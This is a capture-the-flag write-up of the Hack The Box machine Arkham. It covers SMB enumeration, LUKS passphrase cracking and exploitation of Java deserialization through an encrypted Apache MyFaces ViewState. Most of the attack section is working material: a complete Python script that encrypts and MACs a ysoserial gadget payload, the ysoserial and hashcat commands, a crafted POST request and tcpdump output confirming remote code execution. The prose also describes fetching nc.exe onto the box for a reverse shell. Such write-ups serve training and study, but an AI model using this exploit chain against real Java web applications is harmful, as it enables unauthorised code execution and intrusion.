Hack The Box Arkham Detailed Writeup | 10.10.10.130

Arkham is a medium difficulty machine, which is now retired. Here in this post, you can learn the intended way of exploiting this Windows machine.

Once the exploitation is done, you will have learned the following:

● How to exploit Java deserialization (an encrypted Apache MyFaces ViewState) on a Windows machine

ENUMERATION

Let's start with enumeration.

nmap -sV -sT -sC arkham.htb

HERE IS THE NMAP OUTPUT

➜  arkham nmap -sV -sT -sC arkham.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-08 18:54 +03
Nmap scan report for arkham.htb (10.10.10.130)
Host is up (0.18s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8080/tcp open  http          Apache Tomcat 8.5.37
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Mask Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-11-08T15:54:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.83 seconds
➜  arkham 

So, nmap revealed IIS on port 80, Apache Tomcat on port 8080 and SMB (445) open. I went straight to SMB; from experience, it is the service I prefer to enumerate first.

➜  arkham smbclient -L //10.10.10.130 
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	BatShare        Disk      Master Wayne's secrets
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.130 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

There is a share called BatShare whose comment suggests it holds some kind of secrets. Let's go deeper and see what it contains.

The share contains a compressed file called appserver.zip. I used the get command to download it to my local machine to see what it contains.

➜  arkham smbclient -N \\\\10.10.10.130\\BatShare
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb  3 16:00:10 2019
  ..                                  D        0  Sun Feb  3 16:00:10 2019
  appserver.zip                       A  4046695  Fri Feb  1 09:13:37 2019

		5158399 blocks of size 4096. 2130498 blocks available
smb: \> get appserver.zip
getting file \appserver.zip of size 4046695 as appserver.zip (780.2 KiloBytes/sec) (average 780.2 KiloBytes/sec)
smb: \> 

The archive holds two files: a note that reads “Alfred, this is the backup image from our linux server. Please see that The Joker or anyone else doesn’t have unauthenticated access to it. – Bruce” and an encrypted disk image, backup.img.

➜  arkham file backup.img 
backup.img: LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: d931ebb1-5edc-4453-8ab1-3d23bb85b38e
➜  arkham 

Running hashcat in LUKS mode (-m 14600) against backup.img with rockyou.txt recovered the passphrase batmanforever.

➜  arkham hashcat -m 14600 -a 0 backup.img /usr/share/wordlists/rockyou.txt
batmanforever
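Before throwing a wordlist at a LUKS image it is worth reading the header yourself: the cipher, hash and, above all, the PBKDF2 iteration count of the active key slot decide how fast hashcat can go, and the key-slot offsets show which bytes of the image the -m 14600 attack actually consumes. The parser below is an added example (not part of the original writeup) for the public LUKS1 on-disk layout; the sample header it parses is constructed in the code, reusing the cipher, mode, hash, UUID and payload offset that `file` and `cryptsetup status` reported for backup.img, with made-up digests, salts and iteration counts.

```python
"""Parse a LUKS1 header the way `file` and hashcat -m 14600 read it.

Added example, not part of the original writeup. Layout follows the LUKS1
on-disk format specification; SAMPLE_HEADER is constructed for illustration
and is not copied from backup.img.
"""
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
KEYSLOT_ENABLED = 0x00AC71F3
KEYSLOT_DISABLED = 0x0000DEAD
SECTOR = 512
PHDR_FMT = ">6sH32s32s32sII20s32sI40s"   # fixed part of the header: 208 bytes, big-endian
SLOT_FMT = ">II32sII"                     # one key slot: 48 bytes, 8 slots follow the header
PHDR_SIZE = struct.calcsize(PHDR_FMT) + 8 * struct.calcsize(SLOT_FMT)  # 592


def _cstr(raw: bytes) -> str:
    """cipher/mode/hash/uuid are stored as NUL-padded ASCII."""
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")


def parse_luks1_header(blob: bytes) -> dict:
    """Decode the LUKS1 phdr plus its 8 key slots from the first 592 bytes of an image."""
    if len(blob) < PHDR_SIZE:
        raise ValueError("need at least %d bytes of header" % PHDR_SIZE)
    (magic, version, cipher, mode, hash_spec, payload_off, key_bytes,
     mk_digest, mk_salt, mk_iter, uuid) = struct.unpack_from(PHDR_FMT, blob, 0)
    if magic != LUKS_MAGIC:
        raise ValueError("LUKS magic not found")
    if version != 1:
        raise ValueError("this parser handles LUKS1 only, got version %d" % version)
    slots = []
    for i in range(8):
        active, iters, salt, km_off, stripes = struct.unpack_from(
            SLOT_FMT, blob, struct.calcsize(PHDR_FMT) + i * struct.calcsize(SLOT_FMT))
        slots.append({
            "active": active == KEYSLOT_ENABLED,
            "iterations": iters,            # PBKDF2 rounds per candidate: sets the cracking cost
            "salt": salt,
            "key_material_offset": km_off,  # in sectors
            "stripes": stripes,             # anti-forensic split factor, normally 4000
        })
    return {
        "cipher": _cstr(cipher), "mode": _cstr(mode), "hash": _cstr(hash_spec),
        "payload_offset": payload_off, "key_bytes": key_bytes,
        "mk_digest": mk_digest, "mk_digest_salt": mk_salt, "mk_digest_iter": mk_iter,
        "uuid": _cstr(uuid), "keyslots": slots,
    }


def first_active_keyslot(hdr: dict) -> int:
    for i, slot in enumerate(hdr["keyslots"]):
        if slot["active"]:
            return i
    raise ValueError("no active key slot: nothing to crack")


def bytes_needed_for_hashcat(hdr: dict) -> int:
    """Header plus the split key material of the first active slot.

    A candidate passphrase goes through PBKDF2 (slot salt, slot iterations),
    decrypts that material, which is AF-merged into a master key and checked
    against mk_digest. Everything past this offset is payload and irrelevant.
    """
    slot = hdr["keyslots"][first_active_keyslot(hdr)]
    return slot["key_material_offset"] * SECTOR + hdr["key_bytes"] * slot["stripes"]


def _build_sample_header() -> bytes:
    """Constructed header: aes-xts-plain64 / sha256 / 256-bit key / offset 4096,
    as reported for backup.img; digests, salts and iteration counts are made up."""
    phdr = struct.pack(PHDR_FMT, LUKS_MAGIC, 1, b"aes", b"xts-plain64", b"sha256",
                       4096, 32, b"\x11" * 20, b"\x22" * 32, 1000,
                       b"d931ebb1-5edc-4453-8ab1-3d23bb85b38e")
    slots = struct.pack(SLOT_FMT, KEYSLOT_ENABLED, 1000, b"\x33" * 32, 8, 4000)
    for i in range(1, 8):
        slots += struct.pack(SLOT_FMT, KEYSLOT_DISABLED, 0, b"\x00" * 32, 8 + 256 * i, 4000)
    return phdr + slots


SAMPLE_HEADER = _build_sample_header()

if __name__ == "__main__":
    h = parse_luks1_header(SAMPLE_HEADER)
    s = first_active_keyslot(h)
    print("%s-%s, hash %s, %d-bit key, uuid %s"
          % (h["cipher"], h["mode"], h["hash"], h["key_bytes"] * 8, h["uuid"]))
    print("first active slot %d, %d PBKDF2 iterations" % (s, h["keyslots"][s]["iterations"]))
    print("hashcat -m 14600 needs only the first %d bytes of the image" % bytes_needed_for_hashcat(h))
```

Run it against a real image with `parse_luks1_header(open("backup.img", "rb").read(592))`. A low iteration count on the active slot is what makes a rockyou run like the one above feasible; on a header with a high count, the same wordlist can take orders of magnitude longer.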

Next I open the container with that passphrase (cryptsetup luksOpen) and mount /dev/mapper/arkham to see what it contains.

➜  arkham cryptsetup luksOpen backup.img arkham 
➜  arkham cryptsetup -v status arkham
/dev/mapper/arkham is active and is in use.
  type:    LUKS1
  cipher:  aes-xts-plain64
  keysize: 256 bits
  key location: dm-crypt
  device:  /dev/loop0
  loop:    /root/htb/arkham/backup.img
  sector size:  512
  offset:  4096 sectors
  size:    22528 sectors
  mode:    read/write
Command successful.
➜  arkham 

The mounted filesystem holds the script of the film Batman Begins (a PDF), some pictures and a tomcat-stuff directory of Tomcat configuration files.

➜  af474e94-894e-4bb6-897a-adc82884b3d8 ls -laR
.:
total 18
drwxr-xr-x  4 root root  1024 Dec 25  2018 .
drwxr-x---+ 3 root root  4096 Nov  8 19:49 ..
drwx------  2 root root 12288 Dec 25  2018 lost+found
drwxrwxr-x  4 root root  1024 Dec 25  2018 Mask

./lost+found:
total 13
drwx------ 2 root root 12288 Dec 25  2018 .
drwxr-xr-x 4 root root  1024 Dec 25  2018 ..

./Mask:
total 882
drwxrwxr-x 4 root root   1024 Dec 25  2018 .
drwxr-xr-x 4 root root   1024 Dec 25  2018 ..
drwxr-xr-x 2 root root   1024 Dec 25  2018 docs
-rw-rw-r-- 1 root root  96978 Dec 25  2018 joker.png
-rw-rw-r-- 1 root root 105374 Dec 25  2018 me.jpg
-rw-rw-r-- 1 root root 687160 Dec 25  2018 mycar.jpg
-rw-rw-r-- 1 root root   7586 Dec 25  2018 robin.jpeg
drwxr-xr-x 2 root root   1024 Dec 25  2018 tomcat-stuff

./Mask/docs:
total 198
drwxr-xr-x 2 root root   1024 Dec 25  2018 .
drwxrwxr-x 4 root root   1024 Dec 25  2018 ..
-rw-r--r-- 1 root root 199998 Jun 15  2017 Batman-Begins.pdf

./Mask/tomcat-stuff:
total 193
drwxr-xr-x 2 root root   1024 Dec 25  2018 .
drwxrwxr-x 4 root root   1024 Dec 25  2018 ..
-rw-r--r-- 1 root root   1368 Dec 25  2018 context.xml
-rw-r--r-- 1 root root    832 Dec 25  2018 faces-config.xml
-rw-r--r-- 1 root root   1172 Dec 25  2018 jaspic-providers.xml
-rw-r--r-- 1 root root     39 Dec 25  2018 MANIFEST.MF
-rw-r--r-- 1 root root   7678 Dec 25  2018 server.xml
-rw-r--r-- 1 root root   2208 Dec 25  2018 tomcat-users.xml
-rw-r--r-- 1 root root 174021 Dec 25  2018 web.xml
-rw-r--r-- 1 root root   3498 Dec 25  2018 web.xml.bak
➜  af474e94-894e-4bb6-897a-adc82884b3d8 

Going through the files, web.xml.bak looked interesting. Let's see what it contains:

<description>State saving method: 'client' or 'server' (=default). See JSF Specification 2.5.2</description>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>server</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
    <context-param>
        <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
        <param-value>HmacSHA1</param-value>
     </context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
<context-param>
<description>

Well, I found a couple of “secrets”. At this point I did not know what they were used for, so I moved on to the other services on the box. Port 80 is a default IIS page and port 8080 serves a custom website named “Mask Inc.”.

The Mask website has a few links. The “Subscribe” form takes an input, so I entered my name as the email and clicked Sign Up; it confirmed that my email “nav1n” had been registered, so the form does no email validation at all. Let's find out whether it can be exploited. The page is served as userSubscribe.faces and posts a javax.faces.ViewState parameter, which points to a JSF implementation, here Apache MyFaces. To see what happens after sign-up, I intercepted the request in Burp and looked at the server's responses.

BURP SUITE REQUEST

POST /userSubscribe.faces HTTP/1.1
Host: arkham.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://arkham.htb:8080/userSubscribe.faces
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cookie: JSESSIONID=52065CE14788D74374FCA8513A733E2C
Connection: close
Upgrade-Insecure-Requests: 1

j_id_jsp_1623871077_1%3Aemail=nav1n&j_id_jsp_1623871077_1%3Asubmit=SIGN+UP&j_id_jsp_1623871077_1_SUBMIT=1&javax.faces.ViewState=wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RUcOXXNAvTSC70KtDtngjDm0mNzA9qHjYerxo0jW7zu1a6WhnEtXrTblezs7Z7sOU6L5UMg%3D

Hints in the HTB forum suggested that this request carries a Java serialized object, i.e. a potential deserialization vulnerability. That looked like the way in, so I dug into Apache MyFaces, which I had no experience with. The StateUtils API documentation was the most useful reference: https://myfaces.apache.org/core20/myfaces-impl-shared/apidocs/org/apache/myfaces/shared/util/StateUtils.html

The web.xml.bak I found in the mount is related to this: after some brainstorming I understood that the page's ViewState is encrypted and MAC-protected, and the key, MAC algorithm and MAC key are exactly the context parameters in that backup file.

These are the things I collected so far.

  • STATE_SAVING_METHOD: server
  • SECRET: SnNGOTg3Ni0= (base64 from the xml file; decodes to the 8-byte DES key JsF9876-)
  • MAC_ALGORITHM: HmacSHA1
  • MAC_SECRET: SnNGOTg3Ni0= (same value as SECRET)
  • ENCRYPTION_ALGORITHM: DES (MyFaces default)
  • ALGORITHM.PARAMS: ECB/PKCS5Padding (MyFaces default)

PAYLOAD GENERATION

I'm going to use ysoserial to create the serialized payload.

Sending it as-is won't work: the ViewState has to be encrypted and MACed with the secrets found above before the server will deserialize it.

Command:

➜  arkham java -jar /root/ysoserial-master-SNAPSHOT.jar CommonsCollections1 "ping 10.10.14.31" | base64 -w 0
[base64-encoded payload omitted]
➜  arkham 

INSTALLING ysoserial-master-SNAPSHOT.jar To Create Payload

wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

➜  ~ java -jar ysoserial-master-SNAPSHOT.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
  Available payload types:
Nov 08, 2019 9:32:09 PM org.reflections.Reflections scan
INFO: Reflections took 439 ms to scan 1 urls, producing 18 keys and 146 values 
     Payload             Authors                                Dependencies                                                                                                                                                                                        
     -------             -------                                ------------                                                                                                                                                                                        
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5                                                                                                                                                                                           
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                           
     Clojure             @JackOfMostTrades                      clojure:1.8.0                                                                                                                                                                                       
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               
     CommonsCollections1 @frohoff                               commons-collections:3.1                                                                                                                                                                             
     CommonsCollections2 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
     CommonsCollections3 @frohoff                               commons-collections:3.1                                                                                                                                                                             
     CommonsCollections4 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                                                                                             
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1                                                                                                                                                                             
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                                                                                             
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4                                                                                                                                                            
     Groovy1             @frohoff                               groovy:2.3.9                                                                                                                                                                                        
     Hibernate1          @mbechler                                                                                                                                                                                                                                  
     Hibernate2          @mbechler                                                                                                                                                                                                                                  
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                            
     JRMPClient          @mbechler                                                                                                                                                                                                                                  
     JRMPListener        @mbechler                                                                                                                                                                                                                                  
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                        
     Jdk7u21             @frohoff                                                                                                                                                                                                                                   
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2                                                                                                                                                                             
     MozillaRhino1       @matthias_kaiser                       js:1.7R2                                                                                                                                                                                            
     MozillaRhino2       @_tint0                                js:1.7R2                                                                                                                                                                                            
     Myfaces1            @mbechler                                                                                                                                                                                                                                  
     Myfaces2            @mbechler                                                                                                                                                                                                                                  
     ROME                @mbechler                              rome:1.0                                                                                                                                                                                            
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                               
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                           
     URLDNS              @gebl                                                                                                                                                                                                                                      
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                          
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4                                                                                                                                                                 
➜  ~ 

Now, the plan is: base64-decode the secret ==> generate the ysoserial payload ==> encrypt the payload with the decoded secret using DES (ECB mode, PKCS5 padding) ==> compute an HmacSHA1 over the encrypted bytes with the MAC secret and append it ==> base64- and URL-encode the result and send it as javax.faces.ViewState ==> exploit.
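The plan above as working code, an added example that is not the writeup's own nav1n.py (which the post does not reproduce). It implements the MyFaces StateUtils framing: DES in ECB mode with PKCS5 padding (MyFaces' default ALGORITHM.PARAMS) keyed with the base64-decoded SECRET, then an HMAC-SHA1 keyed with MAC_SECRET computed over the ciphertext and appended to it, then base64. Assumptions: the serialized object is whatever ysoserial prints (PLACEHOLDER_PAYLOAD in the block is constructed filler, not a gadget chain, and the jar path in the comment is an assumption); DES comes from pycryptodome (`pip install pycryptodome`); the form field names are the ones captured in Burp above. The decode side is included so you can confirm a token round-trips and that a single flipped byte is rejected, which is the check the server performs before it hands the bytes to ObjectInputStream.

```python
"""MyFaces ViewState packing for the userSubscribe.faces request.

Added example, not the writeup's nav1n.py. Framing follows MyFaces StateUtils:
DES/ECB/PKCS5Padding keyed with the base64-decoded org.apache.myfaces.SECRET,
then HMAC-SHA1 keyed with org.apache.myfaces.MAC_SECRET over the ciphertext,
appended to it, then base64. DES comes from pycryptodome; the rest is stdlib.
PLACEHOLDER_PAYLOAD is constructed filler, not a gadget chain.
"""
import base64
import hashlib
import hmac
import subprocess
import urllib.parse

SECRET_B64 = "SnNGOTg3Ni0="      # org.apache.myfaces.SECRET from web.xml.bak
MAC_SECRET_B64 = "SnNGOTg3Ni0="  # org.apache.myfaces.MAC_SECRET (same value here)
MAC_DIGEST = hashlib.sha1        # org.apache.myfaces.MAC_ALGORITHM = HmacSHA1
MAC_LEN = 20                     # HMAC-SHA1 tag length
BLOCK = 8                        # DES block size
PLACEHOLDER_PAYLOAD = b"\xac\xed\x00\x05" + b"constructed-placeholder-not-a-gadget-chain"


def load_secrets():
    """Both secrets decode to the 8-byte DES key b'JsF9876-'."""
    return base64.b64decode(SECRET_B64), base64.b64decode(MAC_SECRET_B64)


def pkcs5_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK          # always 1..8 bytes, even on a full block
    return data + bytes([n]) * n


def pkcs5_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS5 padding")
    return data[:-n]


def des_ecb(key: bytes, data: bytes, encrypt: bool) -> bytes:
    from Crypto.Cipher import DES          # pycryptodome; lazy so the MAC helpers stay stdlib-only
    cipher = DES.new(key, DES.MODE_ECB)
    return cipher.encrypt(data) if encrypt else cipher.decrypt(data)


def append_mac(ciphertext: bytes, mac_key: bytes) -> bytes:
    """StateUtils.encrypt(): tag = HMAC(mac_key, ciphertext); output = ciphertext || tag."""
    return ciphertext + hmac.new(mac_key, ciphertext, MAC_DIGEST).digest()


def split_and_verify_mac(blob: bytes, mac_key: bytes) -> bytes:
    """Server side: strip the trailing tag and refuse the state unless it matches."""
    if len(blob) <= MAC_LEN:
        raise ValueError("ViewState too short to carry a MAC")
    ciphertext, tag = blob[:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(mac_key, ciphertext, MAC_DIGEST).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC mismatch: state rejected before deserialization")
    return ciphertext


def encode_viewstate(serialized: bytes, secret: bytes, mac_secret: bytes) -> str:
    """Attacker side: serialized Java object -> javax.faces.ViewState value."""
    ciphertext = des_ecb(secret, pkcs5_pad(serialized), True)
    return base64.b64encode(append_mac(ciphertext, mac_secret)).decode()


def decode_viewstate(token: str, secret: bytes, mac_secret: bytes) -> bytes:
    """What MyFaces does on receipt; the returned bytes go straight to ObjectInputStream."""
    ciphertext = split_and_verify_mac(base64.b64decode(token), mac_secret)
    return pkcs5_unpad(des_ecb(secret, ciphertext, False))


def ysoserial(jar: str, gadget: str, command: str) -> bytes:
    """Run ysoserial and return the raw serialized object (jar path is an assumption)."""
    return subprocess.run(["java", "-jar", jar, gadget, command],
                          check=True, capture_output=True).stdout


def form_body(viewstate: str, email: str = "test") -> str:
    """POST body for userSubscribe.faces with the field names captured in Burp."""
    return urllib.parse.urlencode({
        "j_id_jsp_1623871077_1:email": email,
        "j_id_jsp_1623871077_1:submit": "SIGN UP",
        "j_id_jsp_1623871077_1_SUBMIT": "1",
        "javax.faces.ViewState": viewstate,
    })


if __name__ == "__main__":
    secret, mac_secret = load_secrets()
    # Real run: payload = ysoserial("/opt/ysoserial-master-SNAPSHOT.jar", "CommonsCollections1", "ping 10.10.14.31")
    payload = PLACEHOLDER_PAYLOAD
    token = encode_viewstate(payload, secret, mac_secret)
    assert decode_viewstate(token, secret, mac_secret) == payload   # round-trips and MAC verifies
    print(form_body(token))
```

The output of form_body() is the body of the POST shown in Burp with the ViewState swapped for ours; urlencode produces the same `%3A` and `+` escaping as the browser did. Note that the MAC only proves the sender knew MAC_SECRET: once that value has leaked in a backup, the check adds nothing and the server will deserialize whatever is inside.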

The script I wrote to test for RCE was successful: I have code execution on the box. It sends one ViewState per ysoserial gadget, so gadgets that do not accept a plain command (C3P0, FileUpload1) print the errors below and are simply skipped. I started tcpdump to watch for the pings.

EXPLOIT:

➜  arkham python nav1n.py
Error while generating or serializing payload
java.lang.IllegalArgumentException: Command format is: <base_url>:<classname>
	at ysoserial.payloads.C3P0.getObject(C3P0.java:48)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Error while generating or serializing payload
java.lang.IllegalArgumentException: Unsupported command ping 10.10.14.35 [ping 10.10.14.35]
	at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:71)
	at ysoserial.payloads.FileUpload1.getObject(FileUpload1.java:40)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/opt/ysoserial-master-SNAPSHOT.jar) to method java.lang.Object.finalize()
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1

RCE EXPLOIT CONFIRMATION

➜  ~ tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
21:54:41.258850 IP arkham.htb > ns09: ICMP echo request, id 1, seq 9, length 40
21:54:41.258867 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 9, length 40
21:54:42.203633 IP arkham.htb > ns09: ICMP echo request, id 1, seq 10, length 40
21:54:42.203653 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 10, length 40
21:54:43.206836 IP arkham.htb > ns09: ICMP echo request, id 1, seq 11, length 40
21:54:43.206911 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 11, length 40
21:54:43.268574 IP arkham.htb > ns09: ICMP echo request, id 1, seq 12, length 40
21:54:43.268628 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 12, length 40
21:54:44.414674 IP arkham.htb > ns09: ICMP echo request, id 1, seq 13, length 40
21:54:44.414698 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 13, length 40
21:54:44.414722 IP arkham.htb > ns09: ICMP echo request, id 1, seq 14, length 40
21:54:44.414730 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 14, length 40
21:54:45.353063 IP arkham.htb > ns09: ICMP echo request, id 1, seq 15, length 40
21:54:45.353104 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 15, length 40
21:54:46.311118 IP arkham.htb > ns09: ICMP echo request, id 1, seq 16, length 40
21:54:46.311168 IP ns09 > arkham.htb: ICMP echo reply, id 1, seq 16, length 40

With RCE confirmed, I served nc.exe with SimpleHTTPServer, started a listener on port 4444, and sent payloads that fetch nc.exe onto the box and run it back to me.

HERE IS THE REQUEST:

POST /userSubscribe.faces HTTP/1.1
Host: arkham.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://arkham.htb:8080/userSubscribe.faces
Content-Type: application/x-www-form-urlencoded
Content-Length: 3197
Cookie: JSESSIONID=xx
Connection: close
Upgrade-Insecure-Requests: 1

j_id_jsp_1623871077_1%3Aemail=test&j_id_jsp_1623871077_1%3Asubmit=SIGN+UP&j_id_jsp_1623871077_1_SUBMIT=1&javax.faces.ViewState=o4swGdxTZXw1mKtPxFkjUuWrKOBMVnhQ7RbMizpCb4xVYti30eaLecyiLLU7plNhjPFRnShy4IlIzxo0JHimBY3Uq1igjemgy0Ki4udfDHCBAJC2Yt%2BEq3hlEwGdEWrah3tqcdo5Gxzenm%2BTobetH0%2BaG8%2BiCEB1RbCm7b%2FRwuOINGcnD%2BFO3DfRKu9gMF%2Bhys2vYzpsGEyHK3knl7tEaywlBVCuHcXMqHLkcdxxT%2FxmSmtDFG85aQTVagEZSOEEX9bCEH73rYHKIdkiMmo3tRSv0aFcuTCzo9ywZEOE7bULbrBQyiDX34vkaoTgGwZx5xiJxcuYu0CBGPZRDq1UBGH1QEaZ391dmKFPiBhIqgml%2FErcnLpXhN2CNsbBu9HHKSuy0lTdaYJifqCf5zOXppnKQiTkInD9AN%2BIjrIKoKhLslblPlDOJTrY6IWKCYEH9ZL8tl0EWKQbiDEBanGkxqkFjjIIqXZFoV%2BTjkS1FnVO%2FoHWBB6y1rXJo3U1C5yWD2YmTWm4GDisEHwUAFbDTHvZSVfjA0tLKeDOxOM%2F8vhiJvs7XB%2FiL0xioZBCDhyyogM5ilMzKrxi25pKdV7qKFYgBIpi82HZJBiyt0w%2FfqlS6hjo07yHrHeKgVe5KiMmPRtt6h4buRWMlkPun2jgm259cO2loSVMSxjNu9%2FCCnMkGLK3TD9%2BqV2YP5mtCOlGyIG92TCIcaFw8tZsfH14qFQuvLXlje%2BWBoE1cgT2Ozo%2Bus8jmf0nBttP8g%2FGkIl6LoObMsC3BpXUjNHX%2Fl6ZpFrpHPYqF04R1vdMLtxFTMVOrQbaoakmK3uiTmx6KyVVK59aLaXuOysuH%2BsV3gx3v3PoFcpnc1%2BAJTHWKqHfCy1opEh7cDv2tdwg%2FTiZmJ7Y2965FPpV2Dw1mICArOvAOCf9fzZiZncI%2BCoX%2FOuaRilAYhWNKe8XzdQP6NjTNMEAoU8qpv%2FvNvILq22We0wQ1mUW3OrpauOZzU7%2BmQoL%2BGnNtOpmFx%2FzHz9CO1Qw3PfdQHYhQvw4tg%2FW90wu3EVMxVnQ5zD2tQV6GrCAJFCMnfi8x%2Bf6%2BnW9kb%2F3KJjeLP9EaVtnw4HgbxOvCM237bf506YkZewPgxQiLewUhIRMklMJnDnzAWGDt7FI7YRaUwB8JGXyetfsWfwktvElTU8G%2Fq7MLUp4%2BGPRDBvo6SMhFsfpnWDv02QaeNaSLMlE9boIJFbYlwyeLs9OWTCIP4cwrVmtcdeHaJalFuas%2BcLlmoyCpiYNGomoF2fGsKSBlO02H5aD7eIK4KEmO7jZE%2FsAoHMWWJfxo23t44S4ahSOeHfvlzJqhV2WT62diMizXDhDlWLlH5eRWvOufroUtk3jPS%2B%2F%2B6Ud4Bajai2yaRfDxHbTJgZ6IWsFXJmYIJXEh5ODaSShdwisWrLMFqobrL%2B3iOMkCTIPHpwTC4k4WjyVGoC3EmsS4trV68wenfb4asCPSZABGwnwfoqx6CHK%2BPGB13aRjo4KzHOVh7W5RxqOnjWWACJFXGhBny4XW4CootugK59aLaXuOyv6AM6KeF8cfH0GU8FiZ%2BF0wy6hHdRzv29OOgXpgJZaMjXVY9Qh34X7raWi1V1bOk3wI5mPW2oCG%2FHiPH0hgDaLJD%2F5rWumATBRhPfQdMukPUuvh7aBrYKhTjoF6YCWWjI11WPUId%2BF%2B62lotVdWzpNlg7XO%2BO71UXIulcb15uC4Uo%2FmVX%2BF55hhstnKpruvCRn1%2FE2U%2BSHSUwJwYQalMFkB3EYe3B
